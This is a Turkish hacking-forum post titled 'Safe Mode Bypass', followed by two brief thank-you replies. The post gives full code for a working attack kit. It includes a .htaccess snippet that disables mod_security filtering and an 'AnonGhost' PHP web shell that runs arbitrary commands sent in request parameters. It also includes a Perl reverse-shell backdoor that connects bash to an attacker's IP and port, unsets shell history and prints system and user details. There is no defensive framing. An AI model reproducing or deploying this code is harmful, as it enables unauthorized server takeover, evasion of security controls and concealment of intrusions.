Safe Mode Bypass
-
.htaccess <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> kit.php <html><head><title>AnonGhost Perl Connect Shell Priv8</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" /><style type="text/css"> body{ background-color: transparent !important; color: #009900; text-shadow:#000 0px 2px 7px;} a{text-decoration:none; font-family: Tahoma, Geneva; color:#007700; padding:2px 2px;} a:hover{color:#009900; text-shadow:#00ff00 0px 0px 3px;} .area { color: #00bb00; font-size: 9pt; text-shadow:#000000 0px 2px 7px; border: solid 0px #007700; background-color:transparent; box-shadow: 0px 0px 4px #009900; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(0,119,0) 0px 0px 4px; -moz-box-shadow: rgb(0,119,0) 0px 0px 4px; } input[type=submit]{ padding: 3px; color: #00770; font-weight: bold; text-align: center; text-shadow: 0 1px rgba(255, 255, 255, 0.3); background: #aeaeae; background-clip: padding-box; border: 1px solid #284473; border-bottom-color: #223b66; border-radius: 4px; cursor: pointer; background-image:-webkit-linear-gradient(top, #eaeaea, #d0d0d0); background-image: -moz-linear-gradient(top, #eaeaea, #d0d0d0); background-image: -o-linear-gradient(top, #eaeaea, #d0d0d0); background-image: linear-gradient(to bottom, #eaeaea, #d0d0d0); -webkit-box-shadow: inset 0 1px rgba(255, 255, 255, 0.5), inset 0 0 7px rgba(255, 255, 255, 0.4), 0 1px 1px rgba(0, 0, 0, 0.15); box-shadow: inset 0 1px rgba(255, 255, 255, 0.5), inset 0 0 7px rgba(255, 255, 255, 0.4), 0 1px 1px rgba(0, 0, 0, 0.15); } input[type=text]{ padding: 3px; color: #009900; text-shadow: #777777 0px 0px 3px; border: 1px solid #007700; background: transparent; box-shadow: 0px 0px 4px #007700; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(85,85,85) 0px 0px 4px; -moz-box-shadow: rgb(85,85,85) 0px 0px 4px;} input[type=submit]:hover, input[type=text]:hover{ color: #ffffff; text-shadow: #006600 0px 0px 4px; box-shadow: 0px 0px 4px #00dd00; border: 1px solid #00dd00; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgba(0,119,0) 0px 0px 4px; -moz-box-shadow: rgba(0,119,0) 0px 0px 4px;} select{ padding: 3px; width: 162px; color: #00aa00; text-shadow:#000 0px 2px 7px; border: 1px solid #007700; background: transparent; text-decoration: none; box-shadow: 0px 0px 4px #00aa00; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgb(85, 85, 85) 0px 0px 4px; -moz-box-shadow: rgb(85, 85, 85) 0px 0px 4px;} select:hover{ border: 1px solid #00dd00; box-shadow: 0px 0px 4px #00dd00; padding: 3px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: rgba(0,119,0) 0px 0px 4px; -moz-box-shadow: rgba(0,119,0) 0px 0px 4px;} #commands{ margin-left: 350px; margin-right: 350px; } option{ color: #777777; }</style> <?php echo '<center><font color="#007700" face="Tahoma" style="font-size: 11pt">Usage: perl reverse.pl [ipmu] [Portmu]</font><br>'; echo'<p align="center"> <img border="0" ></p><font face="Geneva" align="center" size="2" color="#007700"> Coded By Mauritania Attacker </font><br> <form method=get action="'.$me.'"> <textarea class="area" rows="13" name="S1" cols="70" >'; if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){ echo $_GET['execmethod']($_GET['command']);} if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){ echo $_POST['execmethod']($_POST['command']);} if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){ popen($_GET['command'],"r");} echo'</textarea> <p><center>If nothing work it means that perl is not enabled in this server :(</center></p> <p align="center"><strong>Command: perl reverse.pl yourIP Port</strong><input type=hidden name="vw" size="50" value="cmd"> <input type="text" name="command" size="43"> <select name=execmethod> <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option><option value="popen">popen</option> </select> <input type="submit" value="Execute"> </p></form>'; ?> reverse.pl use IO::Socket; $system = '/bin/bash'; $ARGC=@ARGV; print "AnonGhost BACK-CONNECT BACKDOOR\n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host :(\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host :(\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \!/ \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "AnonGhost BACK-CONNECT BACKDOOR \n\n"; system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); system($system);
reverse.pl chmod 755 verin kit phpden perl aktif sunucularda bypass yapar
-
Hoca yine sahne senin eline sağlık...
-
Eline sağlık hocam.